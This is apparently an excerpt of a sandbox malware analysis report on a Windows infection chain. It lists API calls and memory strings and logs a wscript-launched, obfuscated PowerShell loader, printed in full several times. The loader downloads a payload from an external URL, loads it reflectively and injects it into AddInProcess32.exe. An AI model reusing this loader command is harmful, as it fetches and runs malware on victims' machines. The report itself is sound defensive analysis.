                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,7_2_00408847
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_00407877 FindFirstFileW,FindNextFileW,7_2_00407877
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0044E8F9 FindFirstFileExA,7_2_0044E8F9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,7_2_0040BB6B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,7_2_00419B86
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,7_2_0040BD72
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,7_2_00407CD2
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: powershell.exe, 00000005.00000002.1471977689.0000019CB5B5B000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000007.00000002.2588250443.0000000000C28000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeAPI call chain: ExitProcess graph end nodegraph_7-48949
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00434A8A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,7_2_0041CBE1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_00443355 mov eax, dword ptr fs:[00000030h]7_2_00443355
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_004120B2 GetProcessHeap,HeapFree,7_2_004120B2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_0043503C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00434A8A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_0043BB71
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_00434BD8 SetUnhandledExceptionFilter,7_2_00434BD8

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzF9JysndXJsICcrJz0nKycgezB9aHQnKyd0cCcrJ3MnKyc6Ly9pYTYwMDEnKycwMCcrJy51cy4nKydhcmNoaXZlJysnLm9yJysnZycrJy8yNC8nKydpdGVtcy9kJysnZXQnKydhaC0nKyduJysnb3QnKydlLScrJ3YvRCcrJ2UnKyd0JysnYScrJ2hOJysnb3RlVicrJy4nKyd0JysneCcrJ3R7MH0nKyc7eycrJzEnKyd9YmFzZTYnKyc0JysnQ28nKydudGVudCA9IChOZScrJ3cnKyctT2JqZWMnKyd0IFN5c3RlJysnbS5OZXQuJysnV2ViQ2xpZScrJ250KS5EJysnb3cnKydubCcrJ28nKydhJysnZFN0cmknKyduZyh7MX11JysncmwpOycrJ3snKycxJysnfWJpbicrJ2FyeUNvJysnbicrJ3RlbnQgPScrJyBbU3knKydzdCcrJ2VtLicrJ0MnKydvbnZlcnQnKyddOjonKydGJysncm9tJysnQicrJ2EnKydzZTY0JysnU3RyaW5nKHsxfWJhc2U2NCcrJ0NvbnQnKydlbicrJ3QpO3sxJysnfWFzJysnc2UnKydtYmx5JysnID0nKycgW1JlZmwnKydlY3QnKydpbycrJ24uJysnQXMnKydzZW1ibHknKyddOjpMb2FkJysnKHsxfScrJ2JpbmFyJysneUNvbicrJ3RlbnQpO3sxfXR5JysncCcrJ2UgJysnPSB7MX1hJysnc3MnKydlbWJsJysneScrJy4nKydHZXRUeXAnKydlKHsnKycwfVJ1bicrJ1BFLkhvbWV7JysnMH0pOycrJ3snKycxfW0nKydlJysndCcrJ2gnKydvZCA9IHsxfXR5cCcrJ2UuR2UnKyd0TWUnKyd0aCcrJ29kKHsnKycwfVZBSXswfSk7ezEnKyd9bWV0JysnaG8nKydkJysnLkknKydudm9rZSh7MScrJ31udScrJ2xsJysnLCBbb2InKydqZWMnKyd0WycrJ10nKyddJysnQCcrJyh7JysnMH0wLycrJ1lqemInKyd0JysnL2QvZScrJ2UuZScrJ3RzYXAvLzpzJysncCcrJ3QnKyd0aHswfScrJyAsIHswfWQnKydlJysnc2F0JysnaXZhZCcrJ28nKyd7MH0gJysnLCcrJyB7MH1kZXNhdCcrJ2knKyd2JysnYWQnKydvJysnezB9ICwnKycgeycrJzAnKyd9ZGVzYXRpdicrJ2EnKydkb3swJysnfSwnKyd7MH0nKydBZGRJblByb2MnKydlcycrJ3MnKyczJysnMnswfSx7MH0nKyd7MCcrJ30pKScpLWYgIFtjSEFyXTM5LFtjSEFyXTM2KSB8JiAoICRlTnY6Q09Nc1BFY1s0LDI0LDI1XS1qT2luJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 401000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 459000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 471000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 477000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 478000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 479000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 47E000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 81E008Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe7_2_00412132
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_00419662 mouse_event,7_2_00419662
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzF9JysndXJsICcrJz0nKycgezB9aHQnKyd0cCcrJ3MnKyc6Ly9pYTYwMDEnKycwMCcrJy51cy4nKydhcmNoaXZlJysnLm9yJysnZycrJy8yNC8nKydpdGVtcy9kJysnZXQnKydhaC0nKyduJysnb3QnKydlLScrJ3YvRCcrJ2UnKyd0JysnYScrJ2hOJysnb3RlVicrJy4nKyd0JysneCcrJ3R7MH0nKyc7eycrJzEnKyd9YmFzZTYnKyc0JysnQ28nKydudGVudCA9IChOZScrJ3cnKyctT2JqZWMnKyd0IFN5c3RlJysnbS5OZXQuJysnV2ViQ2xpZScrJ250KS5EJysnb3cnKydubCcrJ28nKydhJysnZFN0cmknKyduZyh7MX11JysncmwpOycrJ3snKycxJysnfWJpbicrJ2FyeUNvJysnbicrJ3RlbnQgPScrJyBbU3knKydzdCcrJ2VtLicrJ0MnKydvbnZlcnQnKyddOjonKydGJysncm9tJysnQicrJ2EnKydzZTY0JysnU3RyaW5nKHsxfWJhc2U2NCcrJ0NvbnQnKydlbicrJ3QpO3sxJysnfWFzJysnc2UnKydtYmx5JysnID0nKycgW1JlZmwnKydlY3QnKydpbycrJ24uJysnQXMnKydzZW1ibHknKyddOjpMb2FkJysnKHsxfScrJ2JpbmFyJysneUNvbicrJ3RlbnQpO3sxfXR5JysncCcrJ2UgJysnPSB7MX1hJysnc3MnKydlbWJsJysneScrJy4nKydHZXRUeXAnKydlKHsnKycwfVJ1bicrJ1BFLkhvbWV7JysnMH0pOycrJ3snKycxfW0nKydlJysndCcrJ2gnKydvZCA9IHsxfXR5cCcrJ2UuR2UnKyd0TWUnKyd0aCcrJ29kKHsnKycwfVZBSXswfSk7ezEnKyd9bWV0JysnaG8nKydkJysnLkknKydudm9rZSh7MScrJ31udScrJ2xsJysnLCBbb2InKydqZWMnKyd0WycrJ10nKyddJysnQCcrJyh7JysnMH0wLycrJ1lqemInKyd0JysnL2QvZScrJ2UuZScrJ3RzYXAvLzpzJysncCcrJ3QnKyd0aHswfScrJyAsIHswfWQnKydlJysnc2F0JysnaXZhZCcrJ28nKyd7MH0gJysnLCcrJyB7MH1kZXNhdCcrJ2knKyd2JysnYWQnKydvJysnezB9ICwnKycgeycrJzAnKyd9ZGVzYXRpdicrJ2EnKydkb3swJysnfSwnKyd7MH0nKydBZGRJblByb2MnKydlcycrJ3MnKyczJysnMnswfSx7MH0nKyd7MCcrJ30pKScpLWYgIFtjSEFyXTM5LFtjSEFyXTM2KSB8JiAoICRlTnY6Q09Nc1BFY1s0LDI0LDI1XS1qT2luJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'1}'+'url '+'='+' {0}ht'+'tp'+'s'+'://ia6001'+'00'+'.us.'+'archive'+'.or'+'g'+'/24/'+'items/d'+'et'+'ah-'+'n'+'ot'+'e-'+'v/D'+'e'+'t'+'a'+'hN'+'oteV'+'.'+'t'+'x'+'t{0}'+';{'+'1'+'}base6'+'4'+'Co'+'ntent = (Ne'+'w'+'-Objec'+'t Syste'+'m.Net.'+'WebClie'+'nt).D'+'ow'+'nl'+'o'+'a'+'dStri'+'ng({1}u'+'rl);'+'{'+'1'+'}bin'+'aryCo'+'n'+'tent ='+' [Sy'+'st'+'em.'+'C'+'onvert'+']::'+'F'+'rom'+'B'+'a'+'se64'+'String({1}base64'+'Cont'+'en'+'t);{1'+'}as'+'se'+'mbly'+' ='+' [Refl'+'ect'+'io'+'n.'+'As'+'sembly'+']::Load'+'({1}'+'binar'+'yCon'+'tent);{1}ty'+'p'+'e '+'= {1}a'+'ss'+'embl'+'y'+'.'+'GetTyp'+'e({'+'0}Run'+'PE.Home{'+'0});'+'{'+'1}m'+'e'+'t'+'h'+'od = {1}typ'+'e.Ge'+'tMe'+'th'+'od({'+'0}VAI{0});{1'+'}met'+'ho'+'d'+'.I'+'nvoke({1'+'}nu'+'ll'+', [ob'+'jec'+'t['+']'+']'+'@'+'({'+'0}0/'+'Yjzb'+'t'+'/d/e'+'e.e'+'tsap//:s'+'p'+'t'+'th{0}'+' , {0}d'+'e'+'sat'+'ivad'+'o'+'{0} '+','+' {0}desat'+'i'+'v'+'ad'+'o'+'{0} ,'+' {'+'0'+'}desativ'+'a'+'do{0'+'},'+'{0}'+'AddInProc'+'es'+'s'+'3'+'2{0},{0}'+'{0'+'}))')-f [cHAr]39,[cHAr]36) |& ( $eNv:COMsPEc[4,24,25]-jOin'')"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgneycrjzf9jysndxjsiccrjz0nkycgezb9ahqnkyd0cccrj3mnkyc6ly9pytywmdenkycwmccrjy51cy4nkydhcmnoaxzljysnlm9yjysnzycrjy8ync8nkydpdgvtcy9kjysnzxqnkydhac0nkydujysnb3qnkydllscrj3yvrccrj2unkyd0jysnyscrj2hojysnb3rlvicrjy4nkyd0jysneccrj3r7mh0nkyc7eycrjzenkyd9ymfzztynkyc0jysnq28nkydudgvudca9ichozscrj3cnkyctt2jqzwmnkyd0ifn5c3rljysnbs5ozxqujysnv2viq2xpzscrj250ks5ejysnb3cnkydubccrj28nkydhjysnzfn0cmknkyduzyh7mx11jysncmwpoycrj3snkycxjysnfwjpbicrj2fyeunvjysnbicrj3rlbnqgpscrjybbu3knkydzdccrj2vtlicrj0mnkydvbnzlcnqnkyddojonkydgjysncm9tjysnqicrj2enkydzzty0jysnu3ryaw5nkhsxfwjhc2u2nccrj0nvbnqnkydlbicrj3qpo3sxjysnfwfzjysnc2unkydtymx5jysnid0nkycgw1jlzmwnkydly3qnkydpbycrj24ujysnqxmnkydzzw1ibhknkyddojpmb2fkjysnkhsxfscrj2jpbmfyjysneunvbicrj3rlbnqpo3sxfxr5jysncccrj2ugjysnpsb7mx1hjysnc3mnkydlbwjsjysnescrjy4nkydhzxruexankydlkhsnkycwfvj1bicrj1bflkhvbwv7jysnmh0poycrj3snkycxfw0nkydljysndccrj2gnkydvzca9ihsxfxr5cccrj2uur2unkyd0twunkyd0accrj29kkhsnkycwfvzbsxswfsk7ezenkyd9bwv0jysnag8nkydkjysnlkknkydudm9rzsh7mscrj31udscrj2xsjysnlcbbb2inkydqzwmnkyd0wycrj10nkyddjysnqccrjyh7jysnmh0wlycrj1lqeminkyd0jysnl2qvzscrj2uuzscrj3rzyxavlzpzjysncccrj3qnkyd0ahswfscrjyasihswfwqnkydljysnc2f0jysnaxzhzccrj28nkyd7mh0gjysnlccrjyb7mh1kzxnhdccrj2knkyd2jysnywqnkydvjysnezb9icwnkycgeycrjzankyd9zgvzyxrpdicrj2enkydkb3swjysnfswnkyd7mh0nkydbzgrjblbyb2mnkydlcycrj3mnkyczjysnmnswfsx7mh0nkyd7mccrj30pkscplwygiftjsefyxtm5lftjsefyxtm2ksb8jiaoicrltny6q09nc1bfy1s0ldi0ldi1xs1qt2lujycp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('{'+'1}'+'url '+'='+' {0}ht'+'tp'+'s'+'://ia6001'+'00'+'.us.'+'archive'+'.or'+'g'+'/24/'+'items/d'+'et'+'ah-'+'n'+'ot'+'e-'+'v/d'+'e'+'t'+'a'+'hn'+'otev'+'.'+'t'+'x'+'t{0}'+';{'+'1'+'}base6'+'4'+'co'+'ntent = (ne'+'w'+'-objec'+'t syste'+'m.net.'+'webclie'+'nt).d'+'ow'+'nl'+'o'+'a'+'dstri'+'ng({1}u'+'rl);'+'{'+'1'+'}bin'+'aryco'+'n'+'tent ='+' [sy'+'st'+'em.'+'c'+'onvert'+']::'+'f'+'rom'+'b'+'a'+'se64'+'string({1}base64'+'cont'+'en'+'t);{1'+'}as'+'se'+'mbly'+' ='+' [refl'+'ect'+'io'+'n.'+'as'+'sembly'+']::load'+'({1}'+'binar'+'ycon'+'tent);{1}ty'+'p'+'e '+'= {1}a'+'ss'+'embl'+'y'+'.'+'gettyp'+'e({'+'0}run'+'pe.home{'+'0});'+'{'+'1}m'+'e'+'t'+'h'+'od = {1}typ'+'e.ge'+'tme'+'th'+'od({'+'0}vai{0});{1'+'}met'+'ho'+'d'+'.i'+'nvoke({1'+'}nu'+'ll'+', [ob'+'jec'+'t['+']'+']'+'@'+'({'+'0}0/'+'yjzb'+'t'+'/d/e'+'e.e'+'tsap//:s'+'p'+'t'+'th{0}'+' , {0}d'+'e'+'sat'+'ivad'+'o'+'{0} '+','+' {0}desat'+'i'+'v'+'ad'+'o'+'{0} ,'+' {'+'0'+'}desativ'+'a'+'do{0'+'},'+'{0}'+'addinproc'+'es'+'s'+'3'+'2{0},{0}'+'{0'+'}))')-f [char]39,[char]36) |& ( $env:comspec[4,24,25]-join'')"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgneycrjzf9jysndxjsiccrjz0nkycgezb9ahqnkyd0cccrj3mnkyc6ly9pytywmdenkycwmccrjy51cy4nkydhcmnoaxzljysnlm9yjysnzycrjy8ync8nkydpdgvtcy9kjysnzxqnkydhac0nkydujysnb3qnkydllscrj3yvrccrj2unkyd0jysnyscrj2hojysnb3rlvicrjy4nkyd0jysneccrj3r7mh0nkyc7eycrjzenkyd9ymfzztynkyc0jysnq28nkydudgvudca9ichozscrj3cnkyctt2jqzwmnkyd0ifn5c3rljysnbs5ozxqujysnv2viq2xpzscrj250ks5ejysnb3cnkydubccrj28nkydhjysnzfn0cmknkyduzyh7mx11jysncmwpoycrj3snkycxjysnfwjpbicrj2fyeunvjysnbicrj3rlbnqgpscrjybbu3knkydzdccrj2vtlicrj0mnkydvbnzlcnqnkyddojonkydgjysncm9tjysnqicrj2enkydzzty0jysnu3ryaw5nkhsxfwjhc2u2nccrj0nvbnqnkydlbicrj3qpo3sxjysnfwfzjysnc2unkydtymx5jysnid0nkycgw1jlzmwnkydly3qnkydpbycrj24ujysnqxmnkydzzw1ibhknkyddojpmb2fkjysnkhsxfscrj2jpbmfyjysneunvbicrj3rlbnqpo3sxfxr5jysncccrj2ugjysnpsb7mx1hjysnc3mnkydlbwjsjysnescrjy4nkydhzxruexankydlkhsnkycwfvj1bicrj1bflkhvbwv7jysnmh0poycrj3snkycxfw0nkydljysndccrj2gnkydvzca9ihsxfxr5cccrj2uur2unkyd0twunkyd0accrj29kkhsnkycwfvzbsxswfsk7ezenkyd9bwv0jysnag8nkydkjysnlkknkydudm9rzsh7mscrj31udscrj2xsjysnlcbbb2inkydqzwmnkyd0wycrj10nkyddjysnqccrjyh7jysnmh0wlycrj1lqeminkyd0jysnl2qvzscrj2uuzscrj3rzyxavlzpzjysncccrj3qnkyd0ahswfscrjyasihswfwqnkydljysnc2f0jysnaxzhzccrj28nkyd7mh0gjysnlccrjyb7mh1kzxnhdccrj2knkyd2jysnywqnkydvjysnezb9icwnkycgeycrjzankyd9zgvzyxrpdicrj2enkydkb3swjysnfswnkyd7mh0nkydbzgrjblbyb2mnkydlcycrj3mnkyczjysnmnswfsx7mh0nkyd7mccrj30pkscplwygiftjsefyxtm5lftjsefyxtm2ksb8jiaoicrltny6q09nc1bfy1s0ldi0ldi1xs1qt2lujycp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('{'+'1}'+'url '+'='+' {0}ht'+'tp'+'s'+'://ia6001'+'00'+'.us.'+'archive'+'.or'+'g'+'/24/'+'items/d'+'et'+'ah-'+'n'+'ot'+'e-'+'v/d'+'e'+'t'+'a'+'hn'+'otev'+'.'+'t'+'x'+'t{0}'+';{'+'1'+'}base6'+'4'+'co'+'ntent = (ne'+'w'+'-objec'+'t syste'+'m.net.'+'webclie'+'nt).d'+'ow'+'nl'+'o'+'a'+'dstri'+'ng({1}u'+'rl);'+'{'+'1'+'}bin'+'aryco'+'n'+'tent ='+' [sy'+'st'+'em.'+'c'+'onvert'+']::'+'f'+'rom'+'b'+'a'+'se64'+'string({1}base64'+'cont'+'en'+'t);{1'+'}as'+'se'+'mbly'+' ='+' [refl'+'ect'+'io'+'n.'+'as'+'sembly'+']::load'+'({1}'+'binar'+'ycon'+'tent);{1}ty'+'p'+'e '+'= {1}a'+'ss'+'embl'+'y'+'.'+'gettyp'+'e({'+'0}run'+'pe.home{'+'0});'+'{'+'1}m'+'e'+'t'+'h'+'od = {1}typ'+'e.ge'+'tme'+'th'+'od({'+'0}vai{0});{1'+'}met'+'ho'+'d'+'.i'+'nvoke({1'+'}nu'+'ll'+', [ob'+'jec'+'t['+']'+']'+'@'+'({'+'0}0/'+'yjzb'+'t'+'/d/e'+'e.e'+'tsap//:s'+'p'+'t'+'th{0}'+' , {0}d'+'e'+'sat'+'ivad'+'o'+'{0} '+','+' {0}desat'+'i'+'v'+'ad'+'o'+'{0} ,'+' {'+'0'+'}desativ'+'a'+'do{0'+'},'+'{0}'+'addinproc'+'es'+'s'+'3'+'2{0},{0}'+'{0'+'}))')-f [char]39,[char]36) |& ( $env:comspec[4,24,25]-join'')"Jump to behavior
                    Source: AddInProcess32.exe, 00000007.00000002.2588250443.0000000000C20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manageresk|
                    Source: AddInProcess32.exe, 00000007.00000002.2588250443.0000000000C28000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagersInfo
                    Source: AddInProcess32.exe, 00000007.00000002.2588250443.0000000000C28000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                    Source: AddInProcess32.exe, 00000007.00000002.2588250443.0000000000C20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerWZ\3000
                    Source: AddInProcess32.exe, 00000007.00000002.2588250443.0000000000C20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerWZ\
                    Source: AddInProcess32.exe, 00000007.00000002.2588250443.0000000000C28000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager-
                    Source: AddInProcess32.exe, 00000007.00000002.2588250443.0000000000C20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerdns.org:3000
                    Source: AddInProcess32.exe, 00000007.00000002.2588250443.0000000000C20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerWZ\3000oft.NET\Framewor
                    Source: AddInProcess32.exe, 00000007.00000002.2588250443.0000000000C20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerWZ\3000d
                    Source: AddInProcess32.exe, 00000007.00000002.2588250443.0000000000C28000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                    Source: AddInProcess32.exe, 00000007.00000002.2588250443.0000000000C20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerWZ\3000x
                    Source: AddInProcess32.exe, 00000007.00000002.2588250443.0000000000C28000.00000004.00000020.00020000.00000000.sdmp, logs.dat.7.drBinary or memory string: [Program Manager]
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_00434CB6 cpuid 7_2_00434CB6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoA,7_2_0040F90C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: EnumSystemLocalesW,7_2_0045201B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: EnumSystemLocalesW,7_2_004520B6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,7_2_00452143
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoW,7_2_00452393
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: EnumSystemLocalesW,7_2_00448484
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,7_2_004524BC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoW,7_2_004525C3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,7_2_00452690
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoW,7_2_0044896D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,7_2_00451D58
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: EnumSystemLocalesW,7_2_00451FD0
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
